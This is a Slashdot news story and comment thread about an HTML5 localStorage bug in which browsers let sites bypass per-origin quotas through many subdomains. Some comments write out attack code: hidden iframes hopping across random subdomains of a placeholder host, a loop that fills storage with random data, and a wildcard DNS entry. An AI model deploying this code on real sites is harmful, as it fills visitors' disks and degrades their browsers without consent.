
HTML5 Storage Bug Can Fill Your Hard Drive

Dystopian Rebel writes "A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE. Feross Aboukhadijeh has demonstrated that these browsers allow unbounded local storage. 'The HTML5 Web Storage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB). ... The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer. However, what if we get clever and make lots of subdomains like 1.filldisk.com, 2.filldisk.com, 3.filldisk.com, and so on? Should each subdomain get 5MB of space? The standard says no. ... However, Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Aboukhadijeh has logged the bug with Chromium and Apple, but couldn't do so for MSIE because 'the page is broken' (see http://connect.microsoft.com/IE). Oops. Firefox's implementation of HTML5 local storage is not vulnerable to this exploit."
  • by Anonymous Coward

    This seems like mental masturbation to me. I see no point in initiating such an "attack".

    If I understand correctly, you are going to expend great effort and possibly money on tens of thousands of subdomains, transfer a lot of data and incur bandwidth charges, in order to fill someone's hard drive? This is about the lamest DoS attack I have ever heard of. And the easy fix is to simply clear cookies?

    Come on, this is a non-issue looking to be a problem.

    • Imagine the network usage bill for your VPS trying to fill every hard drive of every device that visits your site.

      • by thetoadwarrior ( 1268702 ) on Thursday February 28, 2013 @12:41PM (#43035731) Homepage
        It's a web app; let the client generate the data. You generate the free subdomains with a script or something a bit more intelligent, but either way the cost should be minimal. I assume you wouldn't necessarily need to fill the disk completely, either; a gig or two might ruin the browser's performance.
      • by TheRaven64 ( 641858 ) on Thursday February 28, 2013 @01:58PM (#43036769) Journal
        You misunderstand how the attack works. The client-side code is allowed to store 5-10MB per domain, but it can generate this data itself (Math.random() will do fine). The per-domain limit means you need one HTTP request per 5-10MB, but on the server that's handled by a wildcard DNS entry always resolving to the same host. If you set the cache headers with a sufficiently long timeout, then you can probably have a single site hosting the .js (so the browser will only request it once) and then just send a tiny HTML page referencing it. The JavaScript then creates a new iframe with a new (random) subdomain as the target, and so each HTTP request to your server (about 1KB of traffic in total) generates 5-10MB of data on the client's hard disk.
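        Concretely, the per-subdomain hop could look something like this (attacker.example, stub.html, and fill.js are invented names for illustration):

            // fill.js: hypothetical attack script, served once with long
            // cache headers so the browser fetches it only a single time.
            // Assumes the current origin's quota has already been filled
            // (a fill loop is sketched further down the thread).

            // Hop to a fresh origin: a random subdomain under the wildcard
            // DNS entry, loaded in a hidden iframe. The stub page it serves
            // is ~100 bytes of HTML referencing this same (cached) script.
            function nextOrigin() {
              const sub = Math.random().toString(36).slice(2);
              const frame = document.createElement('iframe');
              frame.style.display = 'none';
              frame.src = 'http://' + sub + '.attacker.example/stub.html';
              document.body.appendChild(frame);
            }

            nextOrigin();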
        • So 1k per 10MB. That's a 10,000x multiplier.

          Say I have 1TB of free space. Before I run out of disk, it would take 100MB of transferred data, my browser would have to write out 1TB, and there would be 100,000 HTTP requests and 100,000 iframes. The browser would probably crash after a few hundred.

          I think I'd close my browser because it stopped responding long before I got anywhere near running out of space. And at 100MB/s (an average spinning disk's sequential write speed), I doubt JavaScript could keep up generating data anyway.

            If you look at what he's saying, you'll see that the JavaScript only gets downloaded once for all the domains. For each domain you need an HTML page that just has a script link to the fixed .js file (which your browser already has cached). So, think maybe 100 bytes per 5-10MB.

            • Add all the HTTP headers to your 100 bytes as well, along with the HTTP request itself. The browser will be sending the referrer URL, the user-agent string, cache-control headers, etc.
              1KB seems reasonable.

      • What if the data I stored was a string of "0" characters and the transfer was gz'd? That would shrink it quite drastically.
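        For scale, a quick Node.js sanity check (exact byte counts vary a little by zlib version):

            // Gzip 10 MB of '0' characters and see what's left.
            const zlib = require('zlib');

            const raw = Buffer.alloc(10 * 1024 * 1024, '0'); // 10,485,760 bytes
            const gz = zlib.gzipSync(raw);

            console.log(raw.length, '->', gz.length);
            // Maximally redundant input compresses to roughly 10 KB,
            // i.e. on the order of a 1000:1 ratio.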

        • Reminds me of the GIF of death: a blank, petabyte-sized image, LZW-compressed. It would crash browsers back in the day. Today it would probably wreak havoc with thumbnailing file managers.
      • Imagine the network usage bill for your VPS ...

        Imagine the profits for the HDD companies as people run out of space and order bigger and bigger disks. The HDD companies have the most obvious motive to exploit this bug.

    • Mobile devices? (Score:5, Insightful)

      by dclozier ( 1002772 ) on Thursday February 28, 2013 @12:19PM (#43035399)
      Devices with smaller drives, like a cell phone, a tablet, or a laptop like Google's Pixel, would be more vulnerable. Perhaps you could create some JavaScript that made requests to iterated subdomains, each returning a small amount of JavaScript that then generated large amounts of text to store locally? The bandwidth needed would then be much lower, with the same amount of damage done. I have no idea if this scenario is possible, though, so take it with a grain of salt.
    • by Qzukk ( 229616 ) on Thursday February 28, 2013 @12:19PM (#43035407) Journal

      Subdomains are free. With a wildcard DNS record, you have nearly an infinite supply of them.
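      For example, a hypothetical BIND zone entry (name and address invented) that sends every subdomain to the same host:

          ; Wildcard record: 1.attacker.example, 2.attacker.example, ...
          ; all resolve to one server with no per-subdomain configuration.
          *.attacker.example.   300   IN   A   203.0.113.10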

      • by Anonymous Coward

        , transfer a lot of data and incur bandwidth charges,

        Posting anonymously since this shows how it could be done.

        I don't see any need to transfer data. Simply generate random strings programmatically; one could easily write a few lines of code. The storage API is a 'key' and 'value' system, so just randomly generate keys and values in a loop. Super easy. For the subdomain stuff, like others have said, use a wildcard DNS record. Then just serve the small .js file that runs, then programmatically generates a new random subdomain to load dynamically.
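        A hypothetical version of that loop (all names invented), relying on setItem() throwing once the per-origin quota is exhausted:

            // Generate a random string of at least minLength characters.
            function randomChunk(minLength) {
              let s = '';
              while (s.length < minLength) {
                s += Math.random().toString(36).slice(2); // up to ~11 chars per call
              }
              return s;
            }

            // Fill this origin's localStorage with locally generated junk;
            // no network transfer is needed.
            try {
              for (;;) {
                // Random key, roughly 0.5 MB random value per iteration.
                localStorage.setItem(randomChunk(16), randomChunk(512 * 1024));
              }
            } catch (e) {
              // QuotaExceededError: this origin is full; hop to a new subdomain.
            }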

      • The DNS specifications state the max length of a domain name is 253 characters. Assuming you could get the smallest possible root domain name of 4 characters (x.cc, for example), that means you would have 249 characters left.

        To complicate things a little more the specifications state each label (subdomain) can't exceed 63 characters. That means 3 full subdomains of 63 characters + 1 subdomain of 56 characters if you include the periods. Grand total of 245 characters to play with.

        The specifications also state that the only valid characters in a label are letters, digits, and hyphens, which bounds how many distinct names are possible.

        • 1.955e393, actually.

          You made three mistakes:
          * placing dots differently can give quite a lot of combinations
          * you can have subdomains shorter than the max, which effectively adds dots to the character set, with two restrictions: no two dots in a row (or at the start or end), and no run of more than 63 non-dots. The former reduces the base by a small but noticeable bit; the latter has only an infinitesimal (in the colloquial sense) effect.
          * DNS names are case-insensitive

    • Not sure what effort you are referring to. I can create large numbers of subdomains using a simple script to modify the zone file. Subdomains cost nothing. No effort, and no money.
      Bandwidth is nearly nothing, because I don't have to transfer any data to create data on the victim's drive if I use JavaScript.
      Lastly, you're not thinking about threats holistically. This just becomes one single tool added to a group of other tools that can be employed in an advanced persistent threat attack.
    • by bill_mcgonigle ( 4333 ) * on Thursday February 28, 2013 @12:37PM (#43035689) Homepage Journal

      If you have a popular blog, there's no need to pay for network backup anymore - just drop enough 5MB blocks encrypted and with decent FEC to each of your readers. If you ever have a failure, just throw up a basic page with a funny cat picture and start restoring from your distributed backup.

    • by sjames ( 1099 )

      Of course not. You will hack someone else's server and burn up their bandwidth.

  • Disable Javascript (Score:3, Insightful)

    by Anonymous Coward on Thursday February 28, 2013 @12:08PM (#43035211)

    Of course, you're not vulnerable if you have JavaScript disabled.

    Such is life when your browser automatically downloads and runs arbitrary untrusted software.

  • This sounds like a nice weekend project; I wonder how fast you can fill up a hard disk with just some JavaScript.

    • Assuming 500GB free space and a 20Mbps ADSL connection, call it 2MB/s down... I make it almost three days.

      I think you would notice.

      • by claar ( 126368 ) on Thursday February 28, 2013 @12:22PM (#43035461)

        You're assuming that you have to download the files. It's highly likely the data could be generated locally in JavaScript.

      • His example filled 1GB every 16 seconds, so 500GB in about two hours. That was an SSD though - you're basically limited by your hard drive's write speed (for extra fun, you'll likely fill up the disk cache and start swapping...). You may get 100MB/s from linear writes to a spinning disk, if you're lucky, 20-30MB/s is more plausible. The data isn't fetched from the server, it's generated by the JavaScript.
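        For a rough number on your own machine, a throwaway console micro-benchmark along these lines (hypothetical, and capped by the per-origin quota) gives a feel for the write speed:

            // Time how fast localStorage absorbs 1 MB strings until the
            // per-origin quota (typically 5-10 MB) cuts the loop short.
            const chunk = 'x'.repeat(1024 * 1024); // 1M chars (~2 MB as UTF-16)
            const t0 = performance.now();
            let written = 0;
            try {
              for (let i = 0; i < 64; i++) {
                localStorage.setItem('bench' + i, chunk);
                written += chunk.length;
              }
            } catch (e) {
              // Quota hit: expected well before all 64 iterations complete.
            }
            const secs = (performance.now() - t0) / 1000;
            console.log((written / 1e6).toFixed(0) + ' M chars in ' + secs.toFixed(2) + ' s');
            localStorage.clear(); // tidy up after the test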
  • by Anonymous Coward

    but couldn't do so for MSIE because 'the page is broken' (see http://connect.microsoft.com/IE [microsoft.com]). Oops

    FUD! We haven't received a complaint yet.

    Yours truly,
    MS support.

  • It's a feature! (Score:4, Interesting)

    by sootman ( 158191 ) on Thursday February 28, 2013 @12:16PM (#43035335) Homepage Journal

    1.porn.com, 2.porn.com, 3.porn.com...

    Actually, that could be handy -- you could store lots of music from song.album.artist.someMP3site.com.

    • Re:It's a feature! (Score:4, Interesting)

      by sootman ( 158191 ) on Thursday February 28, 2013 @12:27PM (#43035543) Homepage Journal

      Come to think of it, it could lead to problems. What if you read a lot of blogs hosted on wordpress.com? Or use many apps on *.google.com?

      • by fatphil ( 181876 )
        Of course, you highlight another potential DoS: in the scenario you mention, one site can reduce the quota available to another subdomain, since they share it. It's a lose-lose situation: permit DoSing the user, or permit DoSing other sites on the same 2LD.

        Let's hope they understand how ccTLDs are organised. I don't like the idea of every site under *.co.uk sharing the same 5MB. When they specified cookies, they fucked up; I don't trust them to have learnt from their mistakes and got HTML5 correct, far from it.
        • Let's hope they understand how ccTLDs are organised. I don't like the idea of every site under *.co.uk sharing the same 5MB.

          There's probably a reason that, contrary to the implication in TFS, the actual Web Storage Candidate Recommendation:

          • Recommends, but does not require, a per-origin quota,
          • Recommends, but does not require, user agents to take steps to identify and prevent use of "affiliated origins" to circumvent per-origin quotas,
          • Does not, in the preceding recommendation, provide a concrete definition of "affiliated origins".
        • There's an interesting paper by the Chrome guys from a couple of years back trying to define exactly what a web application is. A modern browser is trying to be an OS, and one of the fundamental tasks of an OS is isolating applications from each other. This is relatively difficult, as two applications may exchange files or use the same libraries, but at least they are launched as different processes. A web application is a tangle of resources from a variety of different domains running in one or more browser windows.

          • by smash ( 1351 )
            I guess the way to do this is via certificate - and allocate x MB of storage per SSL certificate.
  • On Linux, using the Pepper Flash plugin, lots and lots of zombie processes get created and aren't killed even after you exit the browser. When I noticed 5GB of memory usage on an empty desktop, I realized that Chromium is a pro-zombie browser.

    • Chrome will remain running if you have apps installed that want to run in the background. There is an option in Settings to suppress this behavior. On Windows Chrome keeps a notification icon showing so you can shut down the browser and force these background apps to quit. Other platforms probably have something similar.

      Chrome also keeps a process running for Cloud Print, if you have it enabled.

      The 5GB is probably a badly-behaving app/extension. Check Chrome's Task Manager to figure out which one.

  • Isn't everyone's blog a subdomain?
  • A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE.

    OK, so we're talking about Google, Apple, Opera and Microsoft. But then...

    The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer.

    Now we're talking about Google, Mozilla, Opera and Microsoft. Where did Mozilla come from, and where did Apple go?

    Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Firefox's implementation of HTML5 local storage is not vulnerable to this exploit.

    Now we're talking about Google, Apple, Microsoft and Mozilla. Apple's back, and Opera is left out this time, and even though the author seemed to be indicating that Mozilla's browser was on the vulnerable list, now it's set apart.

    Editors, if a summary is inconsistent, please clean it up or don't promote the story.

    • Where did Mozilla come from, and where did Apple go?

      The first part was talking about bugs; the second was talking about storage limits. Mozilla has no bug but does have a storage limit. Apple presumably has the bug, but we don't know what its storage limit is.

    • by ledow ( 319597 )

      And Opera loses mention later on entirely. Probably because the bug doesn't exist on the last few Opera stable versions at all:

      http://www.ledow.org.uk/Opera.jpg [ledow.org.uk]

  • by ledow ( 319597 ) on Thursday February 28, 2013 @01:30PM (#43036359) Homepage

    I call crap on the Opera thing.

    Latest stable Opera browser here, 12.14, updated 5th February:

    http://www.ledow.org.uk/Opera.jpg [ledow.org.uk]

    No mention of this in the 12.14 release notes (even as a "vulnerability with details to follow later", which is common practice for Opera changelogs), and silence on the article about exactly how/why/where Opera is vulnerable.

    If something pops up a million times asking you for a gigabyte and you click yes every time, then that's perfectly acceptable user permission to do so.

    • I wonder how that works. I got that question after the counter was at 76MB. Well, at least it did ask, eventually. So I guess Opera is safe from this.
  • by azav ( 469988 ) on Thursday February 28, 2013 @03:02PM (#43037589) Homepage Journal

    I've seen Safari taking up to 8 GB of RAM. This seems to be due to sloppy variable clearing; it makes the swap file larger and can easily end up taking over your HD.

    Safari ends up being the biggest bloated pig with regard to RAM management on my Mac.

    • Is it also the application you use the most? And was that RAM actually in contention for other processes?

  • There are many, many ways to exhaust resources through a browser. Just generate a huge document, or sit in a recursive loop in JS until the stack fills memory. With a little imagination, various other methods can probably be found.
  • And this is why software homogenization is bad. WebKit is becoming the new IE6, but with far greater consequences, because every smartphone uses a WebKit-based browser by default. Yes, the bug also affected IE and Opera, but Opera cut its core developers and is moving to WebKit, so soon there will be only three major engines, with one of them holding a complete monopoly on smartphones.

  • You should try my new HTML5-enabled cloud storage site. Unlimited cheap space, really fast uploads :)

  • Should each subdomain get 5MB of space? The standard says no

    So, where is the limit supposed to apply? To all subdomains of .com? To all subdomains of .au? How about my ISP who offers me FOO.power.on.net? Should every customer's website on power.on.net have to share the same space?

    Poorly thought out standard is poor.

    The browsers obviously didn't put a limit in for subdomains because it doesn't make sense. You have no idea where the organisational boundary is with regards to domain vs. subdomain.


    • by smash ( 1351 )
      By "didn't put a limit in for subdomains", I of course mean "didn't include subdomains in the parent's quota".
